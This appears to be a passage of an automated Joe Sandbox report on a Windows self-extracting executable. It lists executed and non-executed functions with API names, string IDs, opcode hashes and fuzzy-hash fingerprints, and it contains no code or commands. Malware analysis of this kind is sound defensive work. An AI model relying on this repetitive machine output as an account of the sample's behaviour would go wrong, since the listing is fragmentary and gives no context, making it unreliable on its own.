                                                                    • Opcode ID: 4cd7dd6834e85b2f75631053cfae32537cc947d9a4b936279775a0e79ed0ed39
                                                                    • Instruction ID: 3b8fb6b3f569f3835f96b9333eb57e8847b9005c88af3509748a6bfb270e5cc0
                                                                    • Opcode Fuzzy Hash: 4cd7dd6834e85b2f75631053cfae32537cc947d9a4b936279775a0e79ed0ed39
                                                                    • Instruction Fuzzy Hash: 6231CEF2B0470187F7649B21E555BEAF290F7887A8F10403D9A4646EDCDB7DC6028B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB6648C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: FileLocal$AllocAttributesCloseCreateErrorFreeHandleLast
                                                                    • String ID: TMP4351$.TMP
                                                                    • API String ID: 3233701622-2619824408
                                                                    • Opcode ID: 7db59a4d921e02c4a9f778be00be8e5aed3f3ce684278f5c3ab38008e99838a4
                                                                    • Instruction ID: de09c30d6f87f87d699be696f3ea479567858df605fb946a4ac63df2fe2df246
                                                                    • Opcode Fuzzy Hash: 7db59a4d921e02c4a9f778be00be8e5aed3f3ce684278f5c3ab38008e99838a4
                                                                    • Instruction Fuzzy Hash: BE2180B1A0474087FB249B25E8543AAF291A784BB8F54433CDA6A47BDDCF3CC6478700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB679B0 Relevance: 12.1, APIs: 8, Instructions: 137sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                    • String ID:
                                                                    • API String ID: 2995914023-0
                                                                    • Opcode ID: 40f232f804d3de6f42de40c3d46f48b6aa97a76c85812b48c9ef079cce016815
                                                                    • Instruction ID: ba66f20b8b669a81331c92cdf370f83ddbb145f6ccfd954b5f6693bf78bee030
                                                                    • Opcode Fuzzy Hash: 40f232f804d3de6f42de40c3d46f48b6aa97a76c85812b48c9ef079cce016815
                                                                    • Instruction Fuzzy Hash: 6D5104B6A0564487F7609F21E8507E9A3A0F788775F68403DDA49822ADDF3CCB46CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB64FA0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile$lstrcmp
                                                                    • String ID: *MEMCAB
                                                                    • API String ID: 1301100335-3211172518
                                                                    • Opcode ID: 8a2ec7afe2b51a4f3a104787b125c2abcbb1919d4f600384edff3266c69d9446
                                                                    • Instruction ID: d3ffdab35a020976b7d6d6a08f85a4d46693fb249ebd0bdf12a9d6b03eca823c
                                                                    • Opcode Fuzzy Hash: 8a2ec7afe2b51a4f3a104787b125c2abcbb1919d4f600384edff3266c69d9446
                                                                    • Instruction Fuzzy Hash: 1A61B2F2E1478486FB608F15E9807A9A691F355BB8F544339CAB6037DCCB78C6578B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime$AttributesDateItemLocalText
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    • API String ID: 851750970-552775693
                                                                    • Opcode ID: 7d875f159341b7230950f18f2f71abc3d82ac459eefbd0f33785da50a5c8e793
                                                                    • Instruction ID: 55dbf16a687e866e39d22fff77731713149766cf6b6f0c2783e6199397948509
                                                                    • Opcode Fuzzy Hash: 7d875f159341b7230950f18f2f71abc3d82ac459eefbd0f33785da50a5c8e793
                                                                    • Instruction Fuzzy Hash: 95519EF2A10A4181FB608B21E8507EDA3A0F784BB1F44113EDA5E472DDDA38CBA3C750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB67960 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: __getmainargs
                                                                    • String ID: 0f6
                                                                    • API String ID: 3565562838-657941818
                                                                    • Opcode ID: 275af33df96ac1c1a804af0c188c72368faf2eba7cb6a2ae800b8ec4454fcbff
                                                                    • Instruction ID: 1f56c6ddb861adfc94777e08b2a427723e27af103a669b3ee4395437b10a97cb
                                                                    • Opcode Fuzzy Hash: 275af33df96ac1c1a804af0c188c72368faf2eba7cb6a2ae800b8ec4454fcbff
                                                                    • Instruction Fuzzy Hash: 4AE0EAF6E01A469AEA10AF95F9407D4B7A0F35872AF80412AC94D56338DB3C835BCB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65280 Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                    • String ID:
                                                                    • API String ID: 1084409-0
                                                                    • Opcode ID: d49133d5c2195b87ebe0def94a96092c9cfef79a36c4b08e02082d86901b1f76
                                                                    • Instruction ID: b517bf3a8ef1818dc37bd9838a17487e3245d99881001af7f13cbd8a37a20891
                                                                    • Opcode Fuzzy Hash: d49133d5c2195b87ebe0def94a96092c9cfef79a36c4b08e02082d86901b1f76
                                                                    • Instruction Fuzzy Hash: 3B114FB1A14640C2E720CF56E8443A5E7A0F788BB8F54423DD959476ECCF78C657CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB64E00 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                    • String ID:
                                                                    • API String ID: 2018477427-0
                                                                    • Opcode ID: 243369eae741d19aacabb87601a44f38098308e578327846539de662b5f04598
                                                                    • Instruction ID: 3ef2cb37b17a6c51cd900b120b04390abeb1efaddf3c25d31c830697b3079c67
                                                                    • Opcode Fuzzy Hash: 243369eae741d19aacabb87601a44f38098308e578327846539de662b5f04598
                                                                    • Instruction Fuzzy Hash: F41129B1E14A4086FB545F24E9487E5A691E3453B8F24413DEA48067EDCB7E8B878240
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65350 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: e2199ce9ef1e50f94450445b336f8eb1f800428b427470215b6e51b7e546b616
                                                                    • Instruction ID: d7d31cca3416287176df282aa83bb5dd229f859630670a7dfb952f3c7fad152b
                                                                    • Opcode Fuzzy Hash: e2199ce9ef1e50f94450445b336f8eb1f800428b427470215b6e51b7e546b616
                                                                    • Instruction Fuzzy Hash: 8DF05EB2A14681D3EB1C4F26F6813E8B2A0E748B68F10423DDA27476CCCBB8C592C710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 000000013FB62B24 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 171synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                    • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$tha
                                                                    • API String ID: 3100096412-3380029818
                                                                    • Opcode ID: 99a5b2a0ec1b945be53423b18da261cd1a6f7f9ebb90be66510584ff9c7f5bf8
                                                                    • Instruction ID: cbb91bb52e11c9852e641c07b8d102910fc98208085a42ec8f86f57553cc8ea9
                                                                    • Opcode Fuzzy Hash: 99a5b2a0ec1b945be53423b18da261cd1a6f7f9ebb90be66510584ff9c7f5bf8
                                                                    • Instruction Fuzzy Hash: F581ACF1F1464182FB609B25E9507EAE690B7997B9F10003ED98A46AEDDB7CC747CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB633C0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 161windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                    • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$tha
                                                                    • API String ID: 3530494346-2429308302
                                                                    • Opcode ID: b32232c71f02db9eac751eaa73e0219094b90672794be299764bd12c1609fe4c
                                                                    • Instruction ID: c0e692bfaac61c54a79fd825985789427394629413dbd8dac46edc7734f85d69
                                                                    • Opcode Fuzzy Hash: b32232c71f02db9eac751eaa73e0219094b90672794be299764bd12c1609fe4c
                                                                    • Instruction Fuzzy Hash: 4E619FF1E0468086FBA09B22E9547EAE691A785BB4F18453DCA4647BDDCF3CC7478710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB612C0 Relevance: 16.6, APIs: 11, Instructions: 114memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                    • String ID:
                                                                    • API String ID: 2168512254-0
                                                                    • Opcode ID: 97142c8180b182c09d7e65f73d61bf3d69a57c2ebd7ef9200e0a5b9acfa85d0c
                                                                    • Instruction ID: b3cc1326364e70b5cab66a8656950577a5ad0fa55d2bbfd5ec2e66805118332d
                                                                    • Opcode Fuzzy Hash: 97142c8180b182c09d7e65f73d61bf3d69a57c2ebd7ef9200e0a5b9acfa85d0c
                                                                    • Instruction Fuzzy Hash: 9A5150B2A006408AEB20DF21E4947DDB3A4F748BA8F51513DEA4D93B5CDF39C646CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB61B44 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 2829607268-3733053543
                                                                    • Opcode ID: 755c1f95413603282cdaf0838d41edb21c135bbbd8bb097cb716c8789541b3cb
                                                                    • Instruction ID: e0184e93c3bad98bd53ddd28c51e667ab7906baa323c921cb8e1938539b3e16d
                                                                    • Opcode Fuzzy Hash: 755c1f95413603282cdaf0838d41edb21c135bbbd8bb097cb716c8789541b3cb
                                                                    • Instruction Fuzzy Hash: 142165F2A2464182F7608B60F4597EBF360F798B69F20503DE64A46A5CDF7CC2468B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB68114 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 4104442557-0
                                                                    • Opcode ID: 4f2a0639155c5e925320fcd736b091fdafd92ce9187d839ac1d0c4f5e4d7b07b
                                                                    • Instruction ID: 4fdd18b5eeb022a658e0a1c354d79474eaa87e1d5f3756465266594eb97066e5
                                                                    • Opcode Fuzzy Hash: 4f2a0639155c5e925320fcd736b091fdafd92ce9187d839ac1d0c4f5e4d7b07b
                                                                    • Instruction Fuzzy Hash: D3112C76B01B408AEB10DF71E854399B3A4F70976CF401A39EA6D47B58EF78C6A5C340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB66998 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 434COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                    • String ID: "$:$@$RegServer
                                                                    • API String ID: 1203814774-4077547207
                                                                    • Opcode ID: 12dbcaa9ab24823adec4c851043693544301958f98602ebb2d68d5c9481071a5
                                                                    • Instruction ID: c0a82efb8a462b0a62833d012072c6be307b537c06430c5b354146ddaba80233
                                                                    • Opcode Fuzzy Hash: 12dbcaa9ab24823adec4c851043693544301958f98602ebb2d68d5c9481071a5
                                                                    • Instruction Fuzzy Hash: 2102F4F2F0468481FE648B28D4543E9EBA3A7557B4F58063DD99A0EADDCA39CB07C704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB63720 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 107threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                    • String ID: $tha
                                                                    • API String ID: 2654313074-3973746845
                                                                    • Opcode ID: b3c2b2ef615d35578e8726eb57ba44340733395281d979963716657eb2164978
                                                                    • Instruction ID: 622da078ea5c4a9309699713eef5db0884d42ade5a7e89be44fbabb1218ebca0
                                                                    • Opcode Fuzzy Hash: b3c2b2ef615d35578e8726eb57ba44340733395281d979963716657eb2164978
                                                                    • Instruction Fuzzy Hash: C8418BF1E04A4082FB249B25E9447E9E3A1A784BB5F18423ED91A47BECCF3D8647C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB64768 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                    • API String ID: 1865808269-1731843650
                                                                    • Opcode ID: 736fc19ecd43b7d2575f89e8e3507fd18e5a39b1beba44f6e218ac1590884990
                                                                    • Instruction ID: c4a6c7f3508d432dce1797c5f35629f49cfcd8398f0424e26b3ac270ba3cdfbb
                                                                    • Opcode Fuzzy Hash: 736fc19ecd43b7d2575f89e8e3507fd18e5a39b1beba44f6e218ac1590884990
                                                                    • Instruction Fuzzy Hash: 014157F5A05B8085FB519B11F85079AF7A0F749BA5F844539DE8A07B98DF3CC64AC700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB632B0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 59windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                    • String ID: p}'$tha
                                                                    • API String ID: 3785188418-1583393498
                                                                    • Opcode ID: 27b069c42d7cb845fa97ce8d939dda9c2cba10eeb794f59d18c4f9ea67e0c096
                                                                    • Instruction ID: 9f35cf4f56527674ce44bcf8f41bb74c3b2ae8de18e4af1e3cd3e9cad12d879c
                                                                    • Opcode Fuzzy Hash: 27b069c42d7cb845fa97ce8d939dda9c2cba10eeb794f59d18c4f9ea67e0c096
                                                                    • Instruction Fuzzy Hash: 5A210BF4E0064186FA649B65E8183E4E361A78AB75F58933DC82A463ECDF3D874BC710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB64A70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151memorywindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                    • String ID: rce.$tha
                                                                    • API String ID: 2929476258-4244134132
                                                                    • Opcode ID: 8031d0f5c260d1828ae3b026181698a0ded8a6d20b8c433cb7d87d6f329fc285
                                                                    • Instruction ID: 1f5426d682e87fe3b3cac81c8b5ea8df8b2a283d9281fd370440f9a7b27e1c93
